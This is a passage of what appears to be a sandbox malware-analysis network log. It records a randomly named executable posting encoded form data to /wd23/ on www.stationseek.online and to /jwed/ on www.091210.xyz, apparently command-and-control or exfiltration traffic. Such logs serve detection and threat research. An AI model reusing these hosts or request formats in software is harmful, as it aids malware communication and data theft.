                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              18192.168.2.450025198.251.84.200803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:39:04.017527103 CET748OUTPOST /wd23/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.stationseek.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.stationseek.online
                                                                                                                                                                              Referer: http://www.stationseek.online/wd23/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 73 54 42 64 39 66 57 74 71 61 51 44 31 58 44 45 31 73 33 67 79 55 46 54 69 4a 50 6a 38 42 4c 6f 79 42 47 51 7a 46 63 7a 6c 41 74 5a 51 4c 4a 32 6a 6e 64 51 76 48 31 62 45 4b 6d 43 37 46 39 31 32 62 48 7a 75 2f 43 70 78 71 67 33 75 4a 58 68 41 6e 34 58 4a 59 54 67 6e 68 2b 4d 5a 71 41 45 65 6d 53 67 35 74 44 57 41 2b 75 4a 4a 45 5a 45 43 58 59 33 51 77 6b 31 38 44 6d 68 4b 46 6d 68 48 67 36 61 6b 41 48 78 69 48 76 35 75 59 4b 76 4f 74 4e 43 6a 39 44 45 69 33 4d 4c 38 5a 49 42 4f 70 32 31 57 72 50 47 65 36 6e 48 78 36 41 69 5a 4b 51 52 51 49 6d 69 2f 69 49 51 4a 64 59 36 45 78 65 2f 43 2b 54 2f 30 50 46 42 31 54 51 32 4c 64 4e 2b 42 48 77 3d
                                                                                                                                                                              Data Ascii: 78=sTBd9fWtqaQD1XDE1s3gyUFTiJPj8BLoyBGQzFczlAtZQLJ2jndQvH1bEKmC7F912bHzu/Cpxqg3uJXhAn4XJYTgnh+MZqAEemSg5tDWA+uJJEZECXY3Qwk18DmhKFmhHg6akAHxiHv5uYKvOtNCj9DEi3ML8ZIBOp21WrPGe6nHx6AiZKQRQImi/iIQJdY6Exe/C+T/0PFB1TQ2LdN+BHw=
                                                                                                                                                                              Oct 31, 2024 01:39:04.924788952 CET908INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 707
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:39:04 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              location: http://www.stationseek.online/wd23
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              19192.168.2.450026198.251.84.200803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:39:06.630914927 CET10830OUTPOST /wd23/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.stationseek.online
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.stationseek.online
                                                                                                                                                                              Referer: http://www.stationseek.online/wd23/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 73 54 42 64 39 66 57 74 71 61 51 44 31 58 44 45 31 73 33 67 79 55 46 54 69 4a 50 6a 38 42 4c 6f 79 42 47 51 7a 46 63 7a 6c 44 4e 5a 51 34 52 32 78 30 46 51 75 48 31 62 4b 71 6d 44 37 46 39 6b 32 62 66 76 75 2f 65 54 78 6f 6f 33 76 76 44 68 49 31 51 58 53 49 54 67 6f 42 2b 59 64 71 42 45 65 6d 44 70 35 74 54 57 41 2b 75 4a 4a 47 42 45 4c 6d 59 33 57 77 6b 32 39 44 6d 39 4f 46 6d 46 48 6a 4c 74 6b 44 72 4c 69 30 33 35 72 4a 6d 76 4d 62 78 43 72 39 44 47 6e 33 4d 54 38 5a 45 4f 4f 70 72 4f 57 71 36 6a 65 39 58 48 78 37 31 31 49 37 30 61 48 4f 79 50 73 68 51 37 43 2f 5a 33 49 51 69 49 4b 4e 48 6e 73 38 6f 6f 37 79 70 66 63 75 52 4b 44 53 69 33 49 5a 4d 32 4c 31 58 46 55 46 35 71 64 50 64 6c 36 54 56 71 54 57 76 45 44 4c 6d 61 74 75 67 7a 77 36 53 77 4c 48 6a 59 6c 64 4d 67 5a 2f 47 6d 42 77 30 36 62 30 77 35 77 6a 77 4c 33 72 62 62 6a 72 35 53 45 42 4c 50 50 56 4a 65 6d 4f 44 51 58 47 42 66 4f 58 75 66 64 50 55 37 6e 6b 62 6f 76 33 76 4f 43 37 72 47 39 78 33 46 35 4a 62 47 76 78 56 65 55 45 7a [TRUNCATED]
                                                                                                                                                                              Data Ascii: 78=sTBd9fWtqaQD1XDE1s3gyUFTiJPj8BLoyBGQzFczlDNZQ4R2x0FQuH1bKqmD7F9k2bfvu/eTxoo3vvDhI1QXSITgoB+YdqBEemDp5tTWA+uJJGBELmY3Wwk29Dm9OFmFHjLtkDrLi035rJmvMbxCr9DGn3MT8ZEOOprOWq6je9XHx711I70aHOyPshQ7C/Z3IQiIKNHns8oo7ypfcuRKDSi3IZM2L1XFUF5qdPdl6TVqTWvEDLmatugzw6SwLHjYldMgZ/GmBw06b0w5wjwL3rbbjr5SEBLPPVJemODQXGBfOXufdPU7nkbov3vOC7rG9x3F5JbGvxVeUEzh5q15z+eSg3U1c1dJFBxmd2ipstTg0lY/dXfuMJlXyysvDHP/KGRm3Bk7FtnXIx4r0c2mtfHtmYB+tNIrGop+tPue5wittUUCrmedR63unmIgPTnMfsYDLDIrd0XiMPVaOHC5gAa3nP/hxPXjsAlWutu4CMRxcO/siuKjJSwLsUfi4QXt+ZKJp/Ia5j5GtF6DbUoy406nZR5x+SoKtkaNnkasnAYln/TdBoHvDETPm5/ODnmsABNeN34ydsS79a5ZGlfnDjIyaZGHv/kdCLXw/0F5eP2FhNKHq29NGaxXwwsq2qhAjK71eCryy1Nk3zS8BVDzUz5yVaPsa19cuHibfig1ilI5z1YtCg50JkYuQvC9RlbH2WdvGwtZZv1SFEyhCZkEaJjfCJdIuhT0os/Ff9DmSms/dOmyGX1LiNS8aSi5ukpLrXMSv4MF9LcEUa8Uwa0j4rbT8QSm7mEYtLPVjn5ZNCNz02ehVKbBPeFCNg+7h+Hl+dhKiFm/wd6LAMGML0k9Lg0vMV4Lm8vITiwIkNajDK03O80MohLMy0QJaMJD2rWa4g+OqfhgSYU8NohaGeI7npEKHyvvyOtdZPYpVip8d27YD/snhqlHCurriTRW4a9wNv3WdEndtAkJNxEcOC8sjWIJk77qtdhR16bnZVrDtgeEwG7bC [TRUNCATED]
                                                                                                                                                                              Oct 31, 2024 01:39:07.529956102 CET908INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 707
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:39:07 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              location: http://www.stationseek.online/wd23
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              20192.168.2.450027198.251.84.200803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:39:09.170979023 CET457OUTGET /wd23/?78=hRp9+v2en7tRz1flyqG17kFmttLc1zOskyKd0ztIjTxyYqd810hmijNQE9yj6BxK05vUksKTuuJXofOYLi9PR6uwuESMYbomdUS7hY3ZEsqPIlhTOHkKZSQ=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.stationseek.online
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 31, 2024 01:39:10.080965996 CET1054INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Connection: close
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 707
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:39:09 GMT
                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                              location: http://www.stationseek.online/wd23?78=hRp9+v2en7tRz1flyqG17kFmttLc1zOskyKd0ztIjTxyYqd810hmijNQE9yj6BxK05vUksKTuuJXofOYLi9PR6uwuESMYbomdUS7hY3ZEsqPIlhTOHkKZSQ=&hrOd=1DzdIBZXhZaHw2Wp
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              21192.168.2.450028172.67.154.67803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:39:15.292696953 CET704OUTPOST /jwed/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.091210.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.091210.xyz
                                                                                                                                                                              Referer: http://www.091210.xyz/jwed/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 4d 4e 57 78 6b 48 2f 76 74 6a 7a 62 62 71 79 78 33 30 5a 6a 72 2b 71 4e 5a 70 30 41 78 65 66 35 39 56 68 2f 48 35 49 38 79 6e 49 49 79 50 5a 4c 38 37 79 65 6d 46 46 53 44 6c 55 59 6e 6c 4e 77 6f 52 50 69 57 2b 72 75 73 71 68 44 2b 52 68 67 55 38 76 64 58 62 2f 6b 35 4e 6c 48 41 51 76 52 44 52 47 48 63 43 47 49 67 64 51 66 75 34 45 66 6c 54 74 52 62 30 4f 47 6e 48 49 68 75 76 70 6e 33 4f 76 30 63 42 2b 49 32 39 79 57 4d 37 63 69 62 59 44 53 61 49 42 48 37 6d 68 62 4e 57 70 47 67 4d 6c 52 44 48 43 39 43 50 2f 51 44 53 32 43 64 4a 48 32 69 54 49 51 48 30 7a 48 2f 71 48 62 4c 41 3d 3d
                                                                                                                                                                              Data Ascii: 78=MNWxkH/vtjzbbqyx30Zjr+qNZp0Axef59Vh/H5I8ynIIyPZL87yemFFSDlUYnlNwoRPiW+rusqhD+RhgU8vdXb/k5NlHAQvRDRGHcCGIgdQfu4EflTtRb0OGnHIhuvpn3Ov0cB+I29yWM7cibYDSaIBH7mhbNWpGgMlRDHC9CP/QDS2CdJH2iTIQH0zH/qHbLA==
                                                                                                                                                                              Oct 31, 2024 01:39:15.979545116 CET1032INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:15 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FqvMzc9b4Xm8EXRXwIzEUx8qTuQreof9LnpSj757TG6WG80x4Ho%2BYvbZ3OXo6m%2FtEQVc995R9BOgcYzdANGLOEp83aiuuX2fghWWCXrEggENxLM0%2BYkSujP8%2BDxBpKWVkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8daf9643dcff68f9-DFW
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=704&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 64 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 4e d5 03 48 ab 95 a0 49 45 a5 50 22 70 0f 3d 1a bc 95 2b b5 71 b0 5d 42 f9 7a 94 54 48 5c 67 de 8c 66 e8 a6 7a 59 9a 5d 5b c3 93 79 6e a0 dd 3e 36 eb 25 cc 6e 11 d7 b5 59 21 56 a6 ba 3a f3 42 23 d6 9b 19 2b f2 f9 74 64 f2 62 1d 2b ca 87 7c 14 5e e8 05 6c 42 86 55 38 77 8e f0 2a 2a c2 09 a2 f7 e0 2e 63 ae e4 7f 8c 2f 59 51 cf c6 0b 44 f9 3c 4b ca e2 60 fb da c0 60 13 74 21 c3 7e e4 20 74 90 fd 21 41 92 f8 25 b1 20 ec c7 a6 c8 8a ac 73 51 52 e2 87 de 7e 78 81 b7 09 00 9b 61 18 86 42 df 97 f3 52 17 df 97 1f 68 43 cc 70 a7 09 ff 02 8a 70 5a 44 38 3d f9 05 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 04 f8 69 a3 04 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: d6LN0DwNHIEP"p=+q]BzTH\gfzY][yn>6%nY!V:B#+tdb+|^lBU8w**.c/YQD<K``t!~ t!A% sQR~xaBRhCppZD8=bi0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              22192.168.2.450029172.67.154.67803132C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 31, 2024 01:39:17.833415031 CET724OUTPOST /jwed/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.091210.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.091210.xyz
                                                                                                                                                                              Referer: http://www.091210.xyz/jwed/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Raw: 37 38 3d 4d 4e 57 78 6b 48 2f 76 74 6a 7a 62 61 4c 43 78 32 58 78 6a 6a 2b 71 4f 63 70 30 41 37 2b 65 2b 39 56 39 2f 48 37 6b 53 79 56 73 49 79 74 42 4c 36 4b 79 65 6c 46 46 53 49 46 55 58 70 46 4e 42 6f 52 53 66 57 2b 58 75 73 71 6c 44 2b 55 64 67 55 50 58 65 58 4c 2f 71 69 64 6c 5a 4e 77 76 52 44 52 47 48 63 44 6a 56 67 64 49 66 75 49 30 66 6b 33 35 65 56 55 4f 48 75 6e 49 68 71 76 70 37 33 4f 76 47 63 41 6a 74 32 2b 4b 57 4d 36 4d 69 62 4b 37 52 54 49 42 46 6b 57 67 4d 4e 33 78 4e 6c 4f 55 6e 4f 52 75 71 4e 75 71 39 50 30 37 59 4d 34 6d 68 77 54 73 6a 61 7a 36 7a 79 70 36 53 51 47 6b 41 50 73 61 43 4b 6b 72 56 42 68 4f 32 75 35 39 67 62 68 38 3d
                                                                                                                                                                              Data Ascii: 78=MNWxkH/vtjzbaLCx2Xxjj+qOcp0A7+e+9V9/H7kSyVsIytBL6KyelFFSIFUXpFNBoRSfW+XusqlD+UdgUPXeXL/qidlZNwvRDRGHcDjVgdIfuI0fk35eVUOHunIhqvp73OvGcAjt2+KWM6MibK7RTIBFkWgMN3xNlOUnORuqNuq9P07YM4mhwTsjaz6zyp6SQGkAPsaCKkrVBhO2u59gbh8=
                                                                                                                                                                              Oct 31, 2024 01:39:18.537484884 CET1043INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:18 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BYjP6e0t%2BMYPZTn0qR%2FdKNOPYh%2FGD%2FxnmuQtwXu1eM3XG18S8P9aDiP7oySl%2F0GnVYlRgn10JoshBpGChVIfvvhW4eAm6boYhHx5rM2PrSTfuIaN%2B4E4r4pWB1oQlQ1%2F6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8daf9653c814e73a-DFW
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1145&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=724&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 64 37 0d 0a 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 4e d5 03 48 ab 95 a0 49 45 a5 50 22 70 0f 3d 1a bc 95 2b b5 71 b0 5d 42 f9 7a 94 54 48 5c 67 de 8c 66 e8 a6 7a 59 9a 5d 5b c3 93 79 6e a0 dd 3e 36 eb 25 cc 6e 11 d7 b5 59 21 56 a6 ba 3a f3 42 23 d6 9b 19 2b f2 f9 74 64 f2 62 1d 2b ca 87 7c 14 5e e8 05 6c 42 86 55 38 77 8e f0 2a 2a c2 09 a2 f7 e0 2e 63 ae e4 7f 8c 2f 59 51 cf c6 0b 44 f9 3c 4b ca e2 60 fb da c0 60 13 74 21 c3 7e e4 20 74 90 fd 21 41 92 f8 25 b1 20 ec c7 a6 c8 8a ac 73 51 52 e2 87 de 7e 78 81 b7 09 00 9b 61 18 86 42 df 97 f3 52 17 df 97 1f 68 43 cc 70 a7 09 ff 02 8a 70 5a 44 38 3d f9 05 00 00 ff ff e3 02 00 04 f8 69 a3 04 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: fd7LN0DwNHIEP"p=+q]BzTH\gfzY][yn>6%nY!V:B#+tdb+|^lBU8w**.c/YQD<K``t!~ t!A% sQR~xaBRhCppZD8=i0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
